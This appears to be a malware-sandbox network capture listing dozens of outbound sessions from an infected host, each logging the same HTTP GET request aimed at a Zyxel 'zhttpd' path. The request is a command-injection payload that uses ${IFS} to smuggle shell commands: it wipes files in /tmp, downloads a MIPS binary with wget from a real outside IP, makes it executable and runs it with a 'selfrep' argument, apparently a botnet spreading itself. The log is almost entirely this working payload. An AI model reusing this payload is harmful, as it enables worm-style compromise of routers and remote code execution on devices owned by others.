                                            Jan 14, 2024 15:50:37.374028921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3639192.168.2.2343202155.154.71.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374084949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3640192.168.2.2340250141.60.245.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374115944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3641192.168.2.2358490170.56.44.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374142885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3642192.168.2.2357924193.73.241.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374191046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3643192.168.2.233341667.76.158.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374222040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3644192.168.2.2355064182.5.140.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374254942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3645192.168.2.2347378149.221.95.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374300003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3646192.168.2.2356466108.252.169.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374310017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3647192.168.2.2358896221.9.146.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374320030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3648192.168.2.2338292140.67.243.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374347925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3649192.168.2.2359132117.170.95.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374389887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3650192.168.2.2340320183.235.126.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374437094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3651192.168.2.2355084182.238.235.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374465942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3652192.168.2.236065043.135.193.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374500036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3653192.168.2.233753072.236.16.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374519110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3654192.168.2.233503078.7.139.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374553919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3655192.168.2.2342374193.86.88.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374576092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3656192.168.2.235258699.135.127.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374614954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3657192.168.2.2338224117.207.50.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374633074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3658192.168.2.2352196159.202.210.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374653101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3659192.168.2.2353558192.74.35.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374716043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3660192.168.2.233584865.40.150.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374736071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3661192.168.2.2347264187.15.63.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374764919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3662192.168.2.2360370213.196.50.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374810934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3663192.168.2.2356544126.97.233.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374841928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3664192.168.2.2350702202.54.251.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374866962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3665192.168.2.234624261.197.198.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374893904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3666192.168.2.2355196194.135.129.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374922037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3667192.168.2.2350180194.95.172.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374949932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3668192.168.2.2342648220.198.204.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374980927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3669192.168.2.233319868.144.133.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375009060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3670192.168.2.235442290.105.237.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375029087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3671192.168.2.2358434223.242.46.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375052929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3672192.168.2.2351018213.81.234.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375082016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3673192.168.2.233470098.170.59.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375102997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3674192.168.2.2333366117.56.207.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375155926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3675192.168.2.2336266177.244.175.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375174999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3676192.168.2.234407071.139.99.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375190020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3677192.168.2.2355038207.43.100.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375232935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3678192.168.2.233762446.221.14.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375269890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3679192.168.2.234719846.171.88.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375298977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3680192.168.2.2346614124.167.226.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375340939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3681192.168.2.2342822122.52.10.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375372887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3682192.168.2.235142081.225.117.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375396013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3683192.168.2.2342444154.252.225.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375427961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3684192.168.2.234757482.127.213.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375494957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3685192.168.2.235468276.96.140.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375505924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3686192.168.2.235303620.22.202.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375529051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3687192.168.2.235553057.113.21.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375545979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3688192.168.2.2341252118.64.140.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375596046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3689192.168.2.2343802153.48.151.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375626087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3690192.168.2.2345846132.244.36.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375655890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3691192.168.2.2341840155.52.73.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375684977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3692192.168.2.2340106114.155.57.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375725031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3693192.168.2.2348302146.177.163.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375751972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3694192.168.2.234525458.217.84.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375750065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3695192.168.2.2335976131.117.248.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375802040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3696192.168.2.2336352175.241.0.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375839949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3697192.168.2.2340414183.147.55.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375860929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3698192.168.2.234938876.46.108.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375889063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3699192.168.2.234901268.150.40.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375936031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3700192.168.2.2347678202.81.137.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.375963926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3701192.168.2.2359504205.75.151.169443
                                            TimestampBytes transferredDirectionData
